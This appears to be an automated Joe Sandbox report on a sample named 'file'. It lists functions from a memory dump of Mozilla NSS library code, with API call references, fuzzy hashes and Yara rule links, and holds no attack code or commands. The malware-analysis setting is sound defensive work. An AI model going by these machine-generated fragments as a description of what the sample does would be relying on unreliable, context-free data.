PR_SetError.NSS3(FFFFE09A,00000000,00000004,6C7AC79F,?,?,6C7C5C4A,?), ref: 6C7C4950

Part of subcall function 6C7C8800: TlsGetValue.KERNEL32(?,6C7D085A,00000000,?,6C778369,?), ref: 6C7C8821
Part of subcall function 6C7C8800: TlsGetValue.KERNEL32(?,?,6C7D085A,00000000,?,6C778369,?), ref: 6C7C883D
Part of subcall function 6C7C8800: EnterCriticalSection.KERNEL32(?,?,?,6C7D085A,00000000,?,6C778369,?), ref: 6C7C8856
Part of subcall function 6C7C8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C7C8887
Part of subcall function 6C7C8800: PR_Unlock.NSS3(?,?,?,?,6C7D085A,00000000,?,6C778369,?), ref: 6C7C8899

TlsGetValue.KERNEL32(?,?,?), ref: 6C7C496A
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7C497A
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7C4989

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$CondErrorWait
String ID:
API String ID: 3904631464-0
Opcode ID: a947f267ab947867dbe35ec0d427d8f6f0abf97ecb8cfd52291662dc99a716b3
Instruction ID: e9a7194648132ecfffe479d89e9785b386f62309de99734854c0e7b1dd8e6369
Opcode Fuzzy Hash: a947f267ab947867dbe35ec0d427d8f6f0abf97ecb8cfd52291662dc99a716b3
Instruction Fuzzy Hash: 781122B5B002129FEB205F29DE49A267BB8BF0232DB140535ED4987E12E721E814C7D6

Function 6C7FEDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C7E7FFA,?,6C7E9767,?,8B7874C0,0000A48E), ref: 6C7FEDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C7E7FFA,?,6C7E9767,?,8B7874C0,0000A48E), ref: 6C7FEDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6C7E7FFA,?,6C7E9767,?,8B7874C0,0000A48E), ref: 6C7FEE14

Part of subcall function 6C7D0BE0: malloc.MOZGLUE(6C7C8D2D,?,00000000,?), ref: 6C7D0BF8
Part of subcall function 6C7D0BE0: TlsGetValue.KERNEL32(6C7C8D2D,?,00000000,?), ref: 6C7D0C15

memcpy.VCRUNTIME140(?,?,6C7E9767,00000000,00000000,6C7E7FFA,?,6C7E9767,?,8B7874C0,0000A48E), ref: 6C7FEE33

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: 183d5cadef1aa9186cb96808c97cf489ac15f371bf7a947d443800ba532a22bc
Instruction ID: 85911fda0f079382e66a08440fb0e928e0e066368f5dbdd7bebeade5d6fdcab2
Opcode Fuzzy Hash: 183d5cadef1aa9186cb96808c97cf489ac15f371bf7a947d443800ba532a22bc
Instruction Fuzzy Hash: 0511A7B1A0470AABE7209E65EEC4B0673ACEB0035CF104535E92983F01E330F455C7E1

Function 6C7E08D0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C7E09B3,0000001A,?), ref: 6C7E08E9

Part of subcall function 6C7D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D08B4

SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C7E08FD

Part of subcall function 6C7CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C7C8D2D,?,00000000,?), ref: 6C7CFB85
Part of subcall function 6C7CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C7CFBB1

SECITEM_AllocItem_Util.NSS3(?,00000000,00000001), ref: 6C7E0939
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7E0953

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$ErrorItem_$AllocAlloc_ArenaCopyFindTag_memcpy
String ID:
API String ID: 2572351645-0
Opcode ID: 2e99b12f1c9af86e3f260138aaee893669f473c170dc6a84dddc8e352a0eca88
Instruction ID: 83a5e587f5a104a2c8cceb862938c63b8a0145a53a4837bcc3d3a9b3ade47d40
Opcode Fuzzy Hash: 2e99b12f1c9af86e3f260138aaee893669f473c170dc6a84dddc8e352a0eca88
Instruction Fuzzy Hash: 5401C4B2A0164A6FFB149E369E14B673B98AF4831CF104439EC1AC6E41EF21E4149A95

Function 6C7C49C0 Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 6C7C8800: TlsGetValue.KERNEL32(?,6C7D085A,00000000,?,6C778369,?), ref: 6C7C8821
Part of subcall function 6C7C8800: TlsGetValue.KERNEL32(?,?,6C7D085A,00000000,?,6C778369,?), ref: 6C7C883D
Part of subcall function 6C7C8800: EnterCriticalSection.KERNEL32(?,?,?,6C7D085A,00000000,?,6C778369,?), ref: 6C7C8856
Part of subcall function 6C7C8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C7C8887
Part of subcall function 6C7C8800: PR_Unlock.NSS3(?,?,?,?,6C7D085A,00000000,?,6C778369,?), ref: 6C7C8899

PR_SetError.NSS3 ref: 6C7C4A10
TlsGetValue.KERNEL32(6C7B781D,?,6C7ABD28,00CD52E8,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C7C4A24
EnterCriticalSection.KERNEL32(?,?,?,6C7ABD28,00CD52E8), ref: 6C7C4A39
PR_Unlock.NSS3(?,?,?,?,6C7ABD28,00CD52E8), ref: 6C7C4A4E

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlock$CondErrorWait
String ID:
API String ID: 3904631464-0
Opcode ID: c929e3a6cd9f201876df66039cfc554c82c8bbdd72cd53b474974dc663eaf786
Instruction ID: 0741787084ee0a8e1a73743132dd4569bba423bbc4182f1a27e7dfd25f3d2eb3
Opcode Fuzzy Hash: c929e3a6cd9f201876df66039cfc554c82c8bbdd72cd53b474974dc663eaf786
Instruction Fuzzy Hash: 78214AB4B086028FDB10AF79C28856ABBF4BF45319B014939DC858BB01E734E844CB86

Function 6C76EAD0 Relevance: 6.1, APIs: 4, Instructions: 54networkthreadCOMMON

Download Yara Rule

APIs

htons.WSOCK32(?), ref: 6C76EB13
htonl.WSOCK32(00000000,?), ref: 6C76EB26
htons.WSOCK32(?), ref: 6C76EB44
PR_GetCurrentThread.NSS3(?), ref: 6C76EB58

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: htons$CurrentThreadhtonl
String ID:
API String ID: 2156189399-0
Opcode ID: 5243d57f611700f5f97dcfcd76186a1d3b872dad3889f3ff2a6436c9e06dce0b
Instruction ID: d39a699f8ffc6714f49ac726deeaf0733f5d705cae2351654a026e030fa36bdb
Opcode Fuzzy Hash: 5243d57f611700f5f97dcfcd76186a1d3b872dad3889f3ff2a6436c9e06dce0b
Instruction Fuzzy Hash: 4B11B671D2479597D3208F368E00AB673A0BF95309B01AB1EECCE47E61E770A4C4C3A4

Function 6C798DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C798DE7
EnterCriticalSection.KERNEL32 ref: 6C798DFC
PR_Unlock.NSS3 ref: 6C798E2D
PR_SetError.NSS3 ref: 6C798E49

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 0ea4635a426461dd80599a52b0c45f02127b5c8736158c595e464fb7295fe0a5
Instruction ID: 2184b96a43ecadf109988b4e0ea2b6817e8c745853c7acea71149e495284b12d
Opcode Fuzzy Hash: 0ea4635a426461dd80599a52b0c45f02127b5c8736158c595e464fb7295fe0a5
Instruction Fuzzy Hash: 29118F75A056019BDB10AF78D548569BBF4FF05318F014939DC88D7B01E730E854CBC1

Function 6C802BE0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C802A28,00000060,00000001), ref: 6C802BF0

Part of subcall function 6C7795B0: TlsGetValue.KERNEL32(00000000,?,6C7900D2,00000000), ref: 6C7795D2
Part of subcall function 6C7795B0: EnterCriticalSection.KERNEL32(?,?,?,6C7900D2,00000000), ref: 6C7795E7
Part of subcall function 6C7795B0: PR_Unlock.NSS3(?,?,?,?,6C7900D2,00000000), ref: 6C779605

CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C802A28,00000060,00000001), ref: 6C802C07
SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6C802A28,00000060,00000001), ref: 6C802C1E
free.MOZGLUE(?,00000000,00000000,?,6C802A28,00000060,00000001), ref: 6C802C4A

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Destroy$Certificate$CriticalEnterPublicSectionUnlockValuefree
String ID:
API String ID: 358400960-0
Opcode ID: 4079fbb8c4c3962a90fb585b6eb1869df27f3f601f121c0d3dee14ad6e07a81e
Instruction ID: 002becda233cf0fc4dbe489a0a31febb2a71d0d61516d93e3ae09306fd62260d
Opcode Fuzzy Hash: 4079fbb8c4c3962a90fb585b6eb1869df27f3f601f121c0d3dee14ad6e07a81e
Instruction Fuzzy Hash: 1F015AB1A017005BEB30CF399E08B43B7F8AF50648F110A28E88AC3B41E775F14886A1

Function 6C81AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C805F17,?,?,?,?,?,?,?,?,6C80AAD4), ref: 6C81AC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C805F17,?,?,?,?,?,?,?,?,6C80AAD4), ref: 6C81ACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C80AAD4), ref: 6C81ACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C80AAD4), ref: 6C81ACDB

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: 7a6276d1943769a6bf820f5146f3cd9af62ba0c20566ec0ccfd3680b0f37be5e
Instruction ID: 3e329cfe52c9c7e8a2f47c36f8c86cb97562d39b7e9704fdf5637f450d2ef416
Opcode Fuzzy Hash: 7a6276d1943769a6bf820f5146f3cd9af62ba0c20566ec0ccfd3680b0f37be5e
Instruction Fuzzy Hash: 70015EB1601B029BEB60DF2ADA09793B7E8BF00699B114839D85AD3E00E735F159CBD1

Function 6C7C88E0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,?,6C7D08AA,?), ref: 6C7C88F6
EnterCriticalSection.KERNEL32(?,?,?,?,6C7D08AA,?), ref: 6C7C890B
PR_NotifyCondVar.NSS3(?,?,?,?,?,6C7D08AA,?), ref: 6C7C8936
PR_Unlock.NSS3(?,?,?,?,?,6C7D08AA,?), ref: 6C7C8940

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CondCriticalEnterNotifySectionUnlockValue
String ID:
API String ID: 959714679-0
Opcode ID: cd014e303938e73cb5a3928626850b36949bdceb24fc163197b7c316d6a38b9a
Instruction ID: dfd1e05103ccd13b97f81fa220cce02df013d3bd9df82824bd42a5cd0edf70fc
Opcode Fuzzy Hash: cd014e303938e73cb5a3928626850b36949bdceb24fc163197b7c316d6a38b9a
Instruction Fuzzy Hash: 5F015E74A046069FDB10AF39C188655BBF4FF06358F050A3AD88487B01E730E594CBD2

Function 6C81AC00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,6C805D40,00000000,?,?,6C7F6AC6,6C80639C), ref: 6C81AC2D

Part of subcall function 6C7BADC0: TlsGetValue.KERNEL32(?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE10
Part of subcall function 6C7BADC0: EnterCriticalSection.KERNEL32(?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE24
Part of subcall function 6C7BADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C79D079,00000000,00000001), ref: 6C7BAE5A
Part of subcall function 6C7BADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE6F
Part of subcall function 6C7BADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAE7F
Part of subcall function 6C7BADC0: TlsGetValue.KERNEL32(?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAEB1
Part of subcall function 6C7BADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C79CDBB,?,6C79D079,00000000,00000001), ref: 6C7BAEC9

PK11_FreeSymKey.NSS3(?,6C805D40,00000000,?,?,6C7F6AC6,6C80639C), ref: 6C81AC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6C805D40,00000000,?,?,6C7F6AC6,6C80639C), ref: 6C81AC59
free.MOZGLUE(8CB6FF01,6C7F6AC6,6C80639C,?,?,?,?,?,?,?,?,?,6C805D40,00000000,?,6C80AAD4), ref: 6C81AC62

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID:
API String ID: 1595327144-0
Opcode ID: 327db47b81629ce45ae49c546132406a671d97ca4662c3536b6cf665e6eb230b
Instruction ID: a604e2451f8c99ed1a36a1aa056ce3afacbcfd170d615538c2e4bbaa8f1aaf60
Opcode Fuzzy Hash: 327db47b81629ce45ae49c546132406a671d97ca4662c3536b6cf665e6eb230b
Instruction Fuzzy Hash: 80018FB56002019FDB10DF15EAC4B8677E8AF0471CF188468E8098FB06E731E848CBA1

Function 6C800840 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C8D2F88,6C800660,00000020,00000000,?,?,6C802C3D,?,00000000,00000000,?,6C802A28,00000060,00000001), ref: 6C800860

Part of subcall function 6C6F4C70: TlsGetValue.KERNEL32(?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4C97
Part of subcall function 6C6F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4CB0
Part of subcall function 6C6F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4CC9

TlsGetValue.KERNEL32(00000020,00000000,?,?,6C802C3D,?,00000000,00000000,?,6C802A28,00000060,00000001), ref: 6C800874
EnterCriticalSection.KERNEL32(00000001), ref: 6C800884
PR_Unlock.NSS3 ref: 6C8008A3

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$CallOnce
String ID:
API String ID: 2502187247-0
Opcode ID: 2bd24c67859d80b966dafdf76af98e56a77b210d0f281a2a3832ea96302ce7b1
Instruction ID: 5d581628da238b95719762eae793d5a4287c121142d7d9a901636e3d1d115ba7
Opcode Fuzzy Hash: 2bd24c67859d80b966dafdf76af98e56a77b210d0f281a2a3832ea96302ce7b1
Instruction Fuzzy Hash: E2012B75F042546BEB312F69EE44A557738FB5732DF090D75EC0852E02EB22A854C7E1

Function 6C88CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6C88CC61
free.MOZGLUE ref: 6C88CC6E
DeleteCriticalSection.KERNEL32(?), ref: 6C88CC80
free.MOZGLUE(?), ref: 6C88CC87

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: e74f586d818228a5a950ab09dae3b6012bd41758db257951ea0c7a60814b9ff2
Instruction ID: 5447092ed3c93a3209bb6c0b411e3414a8654ba415925ba3e435b610ded7132f
Opcode Fuzzy Hash: e74f586d818228a5a950ab09dae3b6012bd41758db257951ea0c7a60814b9ff2
Instruction Fuzzy Hash: E8E065B6700608AFCA10EFA9DC48C8777BCEE492743150535E691C3701D232F905CBE1

Function 6C7C4D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C7C4D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C7C4DE6

Strings

%d.%d, xrefs: 6C7C4DDE

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d
API String ID: 2298970422-3954714993
Opcode ID: db05111ebf49a84152b1063b0a2011c1f6bf54cd82b1e80287d603aa38f9c647
Instruction ID: af9c816e45c54f2c68671c2b210d1b6e01f10693eee91ce7df2e9a7122ec88ee
Opcode Fuzzy Hash: db05111ebf49a84152b1063b0a2011c1f6bf54cd82b1e80287d603aa38f9c647
Instruction Fuzzy Hash: C831ECB2E042196FEB606BA59D06BFF7768EF44308F050439ED155B741EB349909CBE2

Function 6C860900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?), ref: 6C860917
sqlite3_value_text.NSS3(?), ref: 6C860923

Part of subcall function 6C7213C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C6F2352,?,00000000,?,?), ref: 6C721413
Part of subcall function 6C7213C0: memcpy.VCRUNTIME140(00000000,R#ol,00000002,?,?,?,?,6C6F2352,?,00000000,?,?), ref: 6C7214C0

Strings

error in %s %s%s%s: %s, xrefs: 6C860944

Memory Dump Source

Source File: 00000000.00000002.2443839789.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2443792411.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444775262.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444797219.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444819516.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2444838828.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_value_text$memcpystrlen
String ID: error in %s %s%s%s: %s
API String ID: 1937290486-1007276823
Opcode ID: 017a37c67e920a315a13f3fe078d0cbe7b378287ec6cf16495784fb71eebf7b5
